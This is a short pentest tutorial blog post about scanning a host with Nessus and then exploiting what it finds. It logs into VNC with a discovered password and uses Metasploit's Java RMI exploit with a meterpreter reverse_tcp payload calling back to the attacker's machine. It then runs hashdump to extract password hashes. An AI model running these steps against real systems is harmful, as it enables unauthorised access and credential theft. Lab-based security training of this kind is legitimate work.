Home linux Nessus How to Perform Vulnerability Scan in Nessus : VNC and RMI Registry Vulnerability Exploitations

How to Perform Vulnerability Scan in Nessus : VNC and RMI Registry Vulnerability Exploitations

Read

Previous articles: How to Install Nessus on Kali , How to Create a policy in Nessus

Step 1:

Go to My Scans section and click New Scan

Step 2:

Go to User Defined Scan and select our Policy

Refer this article to Create Policy: https://www.admincool.com/2021/03/how-to-create-policy-in-nessus.html

Step 3:

Enter Name and Description for our first scan

Step 4:

Add IP address to scan and Save

Sep 5:

Select MyScan and Click Launch icon

Step 6:

Click MyScan to see details

Step 7:

Click Vulnerabilities Tab to see the result

Test VNC Vulnerability identified by Nessus

Run a VNC Viewer by typing xvncviewer. Enter the IP address

To install vnc viewer in kali,

# sudo apt-get install xvncviewer

Enter the password identified by Nessus

Connection Established

# whoami

# uname -a

List directory contents

Vulnerability: RMI Registry Detection

Scan open ports in Background

──(kali㉿kali)-[~]

└─$ nmap -sS -sV 192.168.1.221 -p1-65535

Run msfconsole

Search Exploits of Java_RMI

msf6 > search java_rmi

msf6 > use exploit/multi/misc/java_rmi_server

msf6 exploit(multi/misc/java_rmi_server) > show payloads

msf6 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp

msf6 exploit(multi/misc/java_rmi_server) > show options

msf6 exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.221

msf6 exploit(multi/misc/java_rmi_server) > set SRVHOST 192.168.65.128

msf6 exploit(multi/misc/java_rmi_server) > set LHOST 192.168.65.128

msf6 exploit(multi/misc/java_rmi_server) > show options

msf6 exploit(multi/misc/java_rmi_server) > exploit

Once the connection is obtained,

# sessions –l

# sessions –i 1

# sysinfo

# hashdump

# run /post/linux/gather/hashdump

# getuid

How to Install Nessus on Kali

How to Create a policy in Nessus

No comments:

Subscribe to: Post Comments ( Atom )